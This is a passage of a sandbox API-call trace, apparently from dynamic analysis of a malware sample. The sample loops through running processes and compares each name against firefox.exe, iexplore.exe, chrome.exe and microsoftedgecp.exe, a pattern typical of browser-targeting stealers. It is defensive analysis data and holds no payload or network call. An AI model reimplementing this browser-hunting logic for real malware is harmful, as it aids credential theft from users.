out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0239.971] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0239.971] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0239.971] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0239.971] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.971] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0239.971] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0239.971] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0239.971] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0239.971] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.971] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0239.972] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0239.972] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0239.972] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0239.972] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.972] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0239.973] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0239.973] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0239.973] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0239.973] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.973] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0239.973] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0239.973] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0239.973] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0239.973] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.973] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0239.974] CloseHandle (hObject=0xd4) returned 1 [0239.974] Sleep (dwMilliseconds=0x3e8) [0241.005] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0241.007] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.008] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0241.008] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0241.008] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0241.008] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0241.008] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0241.008] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0241.008] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0241.008] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0241.008] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0241.008] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0241.009] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0241.009] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0241.009] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0241.009] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.009] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0241.009] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0241.009] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0241.009] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0241.009] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.009] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0241.010] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0241.010] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0241.010] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0241.010] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.010] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0241.010] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0241.010] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0241.010] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0241.011] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.011] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0241.011] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0241.011] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0241.011] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0241.011] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.011] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0241.012] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0241.012] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0241.012] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0241.012] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.012] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0241.012] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0241.012] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0241.012] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0241.012] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.012] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0241.013] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0241.013] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0241.013] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0241.013] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.013] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.013] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0241.013] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0241.013] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0241.014] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.014] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.014] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0241.014] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0241.014] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0241.014] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.014] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.015] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0241.015] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0241.015] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0241.015] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.015] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.015] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0241.015] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0241.015] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0241.015] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.015] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.016] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0241.016] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0241.016] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0241.016] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.016] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0241.016] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0241.016] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0241.016] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0241.016] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.016] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.017] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0241.017] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0241.017] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0241.017] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.017] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.017] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0241.017] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0241.017] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0241.017] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.017] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0241.018] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0241.018] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0241.018] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0241.018] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.018] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0241.019] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0241.019] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0241.019] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0241.019] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.019] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0241.019] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0241.019] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0241.019] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0241.019] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.019] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.020] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0241.020] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0241.020] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0241.020] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.020] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0241.020] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0241.020] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0241.020] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0241.020] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.020] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0241.021] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0241.021] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0241.021] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0241.021] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.021] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0241.021] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0241.021] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0241.021] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0241.021] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.021] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0241.022] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0241.022] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0241.022] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0241.022] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.022] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0241.022] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0241.023] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0241.023] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0241.023] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.023] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0241.023] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0241.023] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0241.023] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0241.023] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.023] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0241.024] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0241.024] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0241.024] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0241.024] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.024] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0241.024] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0241.024] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0241.024] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0241.024] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.024] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0241.025] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0241.025] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0241.025] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0241.025] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.025] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0241.025] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0241.025] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0241.025] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0241.025] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.025] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0241.026] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0241.026] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0241.026] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0241.026] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0241.026] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0241.026] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0241.026] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0241.026] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0241.026] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.026] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0241.027] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0241.027] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0241.027] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0241.027] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0241.027] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, 